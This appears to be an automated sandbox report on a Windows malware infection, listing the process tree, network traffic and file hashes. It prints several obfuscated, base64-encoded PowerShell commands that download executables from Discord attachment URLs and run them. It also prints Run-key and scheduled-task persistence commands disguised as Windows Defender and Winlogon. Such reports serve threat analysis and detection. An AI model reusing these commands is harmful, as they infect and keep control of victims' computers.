C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADUANQA3ADYANwAyADAANgA5ADcANAA1ADkANQAwADkAMwAvADEAMQA3ADYANAA2ADkAOQAyADgAMQA1ADMANAA2ADkAMAAyADgALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHgAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAZwBxACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAZwBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEASABGAEoAMwAyAC4AZQB4AGUAJwApACkAPAAjAG4AdQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHcAegBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAGQAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAEgARgBKADMAMgAuAGUAeABlACcAKQA8ACMAagB5AHcAIwA+AA=="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwB3ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA5ADAAMwAyADYAMAAyADcAMAA2ADAAMgAvAFcAaQBuAGwAbwBnAG8AbgAuAGUAeABlACcALAAgADwAIwBqAGUAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAawB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAYgB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABHAEYASgAzADIALgBlAHgAZQAnACkAKQA8ACMAcQB1AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABiAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGwAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAHgAegBlACMAPgA="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA5ADIANQAxADYAMgA5ADEAMwA4ADIAMgAvAEQAcwBGAHIAQQBLAE4AWABtAFcALgBlAHgAZQAnACwAIAA8ACMAdQBwAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAHkAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHQAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARwBGAEoAMwAyAC4AZQB4AGUAJwApACkAPAAjAGMAbAB6ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAGQAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARwBGAEoAMwAyAC4AZQB4AGUAJwApADwAIwBqAHEAYQAjAD4A"

C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe

C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe

C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe

C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAegBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA4ADkAMwAzADEAOQA3ADcANAAyADAAOAAvAGoAaABzAGQALgBlAHgAZQAnACwAIAA8ACMAcAB0AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHoAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAGoAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEgARwBHAEYASgAzADIALgBlAHgAZQAnACkAKQA8ACMAagBqAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQBrAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHIAZgBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQASABHAEcARgBKADMAMgAuAGUAeABlACcAKQA8ACMAeAB3AGoAIwA+AA=="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYwByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA4ADAAMQA0ADEANAAxADYAOAA2ADIANgAvAGUAbABlAGMAaQBpAHAAaQBjAGwALgBlAHgAZQAnACwAIAA8ACMAcQBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGsAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGcAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AEgAQwBHAEcARgBKADMAMgAuAGUAeABlACcAKQApADwAIwBjAHcAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBmAGMAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB1AHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQBIAEMARwBHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAHAAYgBqACMAPgA="

C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe

C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe

C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe

C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdwBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADcAMwA2ADcAOAA4ADAAOQAxADUANwA2ADUAMgAvAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQA/AGUAeAA9ADYANQA2AGUAZgBmADcAZQAmAGkAcwA9ADYANQA1AGMAOABhADcAZQAmAGgAbQA9ADQANgBkAGMANQBlAGMAMwA1ADkAZgA4AGEANgA2AGYAMAA4AGUAZQBmAGQANgA0ADIAZgA2AGYANAA0ADIANAA4ADQANAA0ADAAYgBiADIANAA0AGIAYwBhADcANAAwAGUAMAA0ADYAYwAzADMAMwBjADcAOQAyADEAYQA1ADgAJgAnACwAIAA8ACMAYwBqAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHYAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AEgAQwBHAEcARgBKADMAMgAuAGUAeABlACcAKQApADwAIwByAHAAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGEAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBiAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgBIAEMARwBHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAGIAdwB4ACMAPgA="

C:\Users\Admin\AppData\Roaming\1HFJ32.exe

"C:\Users\Admin\AppData\Roaming\1HFJ32.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsDefender';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsDefender' -Value '"C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WindowsDefender /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WindowsDefender /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Users\Admin\AppData\Roaming\2HGFJ32.exe

"C:\Users\Admin\AppData\Roaming\2HGFJ32.exe"

C:\Users\Admin\AppData\Roaming\2HGFJ32.exe

"C:\Users\Admin\AppData\Roaming\2HGFJ32.exe"

C:\Users\Admin\AppData\Roaming\2HGFJ32.exe

"C:\Users\Admin\AppData\Roaming\2HGFJ32.exe"

C:\Users\Admin\AppData\Roaming\3HGFJ32.exe

"C:\Users\Admin\AppData\Roaming\3HGFJ32.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Winlogon';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Winlogon' -Value '"C:\Users\Admin\AppData\Roaming\Winlogon\Winlogon.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \Winlogon /tr "C:\Users\Admin\AppData\Roaming\Winlogon\Winlogon.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \Winlogon /tr "C:\Users\Admin\AppData\Roaming\Winlogon\Winlogon.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\4HGGFJ32.exe

"C:\Users\Admin\AppData\Roaming\4HGGFJ32.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2732 -ip 2732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 804

C:\Users\Admin\AppData\Roaming\5HCGGFJ32.exe

"C:\Users\Admin\AppData\Roaming\5HCGGFJ32.exe"

C:\Users\Admin\AppData\Roaming\6HCGGFJ32.exe

"C:\Users\Admin\AppData\Roaming\6HCGGFJ32.exe"

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "chcp"

C:\Windows\SysWOW64\chcp.com

chcp

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\xzmsckdqdkptessh" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 --field-trial-handle=1960,i,886740756664452592,11699590037534784759,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\xzmsckdqdkptessh" --mojo-platform-channel-handle=2156 --field-trial-handle=1960,i,886740756664452592,11699590037534784759,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 212.177.72.148.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 147.255.221.88.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 148.72.177.212:443 textbin.net tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 198.5.85.104.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:9371 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
TR 46.1.103.69:9371 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:2341 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:9371 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:9371 tcp
US 8.8.8.8:53 169.255.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
TR 46.1.103.69:2341 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
TR 46.1.103.69:9371 tcp
TR 46.1.103.69:9371 tcp
TR 46.1.103.69:2341 tcp
TR 46.1.103.69:9371 tcp
TR 46.1.103.69:9371 tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
TR 46.1.103.69:2341 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
TR 46.1.103.69:9371 tcp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 store8.gofile.io udp
US 206.168.191.31:443 store8.gofile.io tcp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 31.191.168.206.in-addr.arpa udp

Files

memory/740-0-0x00007FF633940000-0x00007FF633AA4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\HxbrE62adx.sln

MD5 49e83452237bee03b19fcf08da6f1d9c
SHA1 6ab1082f3e64030b998cb1202b77e0817e051f9b
SHA256 97befc6c51ae1ea71ba40f0a0ae8bad63d45522d121cfa7bdac024d40351fdcf
SHA512 80d05f957efa5ff437f6cce58d77a2c59e8c0034eecaa05a3dcd0b8f1e95964c2c726886f800d002249650629bf48dc767652ee897b717c2edee2e55acb71bc2

C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe

MD5 a75b85a9502a6933aa0a9873ac3a6df0
SHA1 b477e4eb9df62f6e3e80a6e3e54b4d2812c842ed
SHA256 940d2c9ae3f5545cd6ec398089907f79c34e0c4341a23d2d2aaa7716378f3701
SHA512 cdb238f48c60f92dc7896c7f5d6d4ea52499e918740c782092b59fbb96e0a1369ceb63be82c28c45683efae0480a94ee6369bbd10408907b24d15232e053bce7

C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe

MD5 a75b85a9502a6933aa0a9873ac3a6df0
SHA1 b477e4eb9df62f6e3e80a6e3e54b4d2812c842ed
SHA256 940d2c9ae3f5545cd6ec398089907f79c34e0c4341a23d2d2aaa7716378f3701
SHA512 cdb238f48c60f92dc7896c7f5d6d4ea52499e918740c782092b59fbb96e0a1369ceb63be82c28c45683efae0480a94ee6369bbd10408907b24d15232e053bce7

memory/4580-8-0x0000000000690000-0x0000000000698000-memory.dmp

memory/4580-10-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe

MD5 a25afcfcab5014e3b1c1d00be2ed1c98
SHA1 33b01c0c85791e70deab178c307b976856a53f17
SHA256 18c04e1e7011010cc0cf983dda84804c03bb1de35adff177614f6a4d537f5e6d
SHA512 2a90d06ffd8b9dc086ab5000ba988a66b532ef0918e7e4b24fda564af5b1a1c4ff4bf2243f2bea986ae81272a8868401996aafcc3576e624e721e0d34466410e

C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe

MD5 3ed2b4079de8367146d73a4eabbb527b
SHA1 59ae6a2c2c6fa1aa8c7bffc04e6123c5b301c038
SHA256 cf7251cce700eca1370e65fb29f0e5e960a44ac77347ffcaa7daab45f693a8be
SHA512 f7a6e86c1a33e212c932a0a7f3f2674018ed8a48ccd24380ee2a199a0c9133971577d6c7cc93e1ea8294bc68657bbcb8342b8f103dc201a3d37602a8882d5a8d

C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe

MD5 3ed2b4079de8367146d73a4eabbb527b
SHA1 59ae6a2c2c6fa1aa8c7bffc04e6123c5b301c038
SHA256 cf7251cce700eca1370e65fb29f0e5e960a44ac77347ffcaa7daab45f693a8be
SHA512 f7a6e86c1a33e212c932a0a7f3f2674018ed8a48ccd24380ee2a199a0c9133971577d6c7cc93e1ea8294bc68657bbcb8342b8f103dc201a3d37602a8882d5a8d

memory/3948-21-0x0000000000020000-0x0000000000028000-memory.dmp

memory/3464-19-0x00000000003C0000-0x00000000003C8000-memory.dmp

memory/4580-22-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

memory/3464-23-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe

MD5 a25afcfcab5014e3b1c1d00be2ed1c98
SHA1 33b01c0c85791e70deab178c307b976856a53f17
SHA256 18c04e1e7011010cc0cf983dda84804c03bb1de35adff177614f6a4d537f5e6d
SHA512 2a90d06ffd8b9dc086ab5000ba988a66b532ef0918e7e4b24fda564af5b1a1c4ff4bf2243f2bea986ae81272a8868401996aafcc3576e624e721e0d34466410e

memory/3948-25-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

memory/3464-29-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

memory/3948-30-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe

MD5 0e2c37cc209fd52cce861928d859ab2d
SHA1 773ce4304e33a6cd74432572472244d8bf8e2d14
SHA256 081d8540af456e8725aa2de3bf1d18dcfad5aceb0a86c7fc5b8c847b1a78f051
SHA512 9ca95e3d40f6c95d0cf8c372aa68c49b276dd6731865c02e657e7e25e871e78b6f52e857b4f507acdc575942f9cb7c449586afab0dc3285ea6d727ae5c250b2e

memory/4396-32-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe

MD5 0e2c37cc209fd52cce861928d859ab2d
SHA1 773ce4304e33a6cd74432572472244d8bf8e2d14
SHA256 081d8540af456e8725aa2de3bf1d18dcfad5aceb0a86c7fc5b8c847b1a78f051
SHA512 9ca95e3d40f6c95d0cf8c372aa68c49b276dd6731865c02e657e7e25e871e78b6f52e857b4f507acdc575942f9cb7c449586afab0dc3285ea6d727ae5c250b2e

memory/4396-37-0x000002050B080000-0x000002050B090000-memory.dmp

memory/4396-39-0x000002050B080000-0x000002050B090000-memory.dmp

memory/740-38-0x00007FF633940000-0x00007FF633AA4000-memory.dmp

memory/3708-40-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe

MD5 142a3cc69d15044024d4ccd3282e20f6
SHA1 a2ebe1b4cddc1012ba96c8e4dc0905d95501f69b
SHA256 dccd94fcb5cd38b6077af35e7e85aaa867f263a9d00910197388e11e71c6b5e3
SHA512 9da05e395f0636b90d1c9132d485ca75bbb1a2bccfe46b1ae0c1bab6e5101928a2b548786e66aebde27e5b005ccdf0c48592b87659f7688a1976a70c1982ca6f

memory/4436-44-0x0000000000CE0000-0x0000000000CE8000-memory.dmp

memory/3708-46-0x00000235657E0000-0x00000235657F0000-memory.dmp

memory/3708-45-0x00000235657E0000-0x00000235657F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe

MD5 142a3cc69d15044024d4ccd3282e20f6
SHA1 a2ebe1b4cddc1012ba96c8e4dc0905d95501f69b
SHA256 dccd94fcb5cd38b6077af35e7e85aaa867f263a9d00910197388e11e71c6b5e3
SHA512 9da05e395f0636b90d1c9132d485ca75bbb1a2bccfe46b1ae0c1bab6e5101928a2b548786e66aebde27e5b005ccdf0c48592b87659f7688a1976a70c1982ca6f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xw13kjwk.yto.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1804-47-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

memory/1520-36-0x0000000000C60000-0x0000000000C68000-memory.dmp

memory/1520-69-0x00007FFE32770000-0x00007FFE33231000-memory.dmp

memory/4396-54-0x000002050B0E0000-0x000002050B102000-memory.dmp

memory/1804-53-0x0000018E6A1A0000-0x0000018E6A1B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe

MD5 887c8ab2ee3e223da282a35dec64a61f
SHA1 ec43ea5d449853c514c527ba55a26e677795b8a9
SHA256 1391f4b5a1319940dec3f724e9dd6ce01cb596cd691c71b271e448e496b6e3c6
SHA512 7f7d50e546a363af9a303d02e8e3b650af512194d78e4f4310caba0d502d7fdd426d516059c4df6f1deab1d4f6e97c3267a3a3af02893ed1739ded3bbf9f7a18

C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe

MD5 887c8ab2ee3e223da282a35dec64a61f
SHA1 ec43ea5d449853c514c527ba55a26e677795b8a9
SHA256 1391f4b5a1319940dec3f724e9dd6ce01cb596cd691c71b271e448e496b6e3c6
SHA512 7f7d50e546a363af9a303d02e8e3b650af512194d78e4f4310caba0d502d7fdd426d516059c4df6f1deab1d4f6e97c3267a3a3af02893ed1739ded3bbf9f7a18

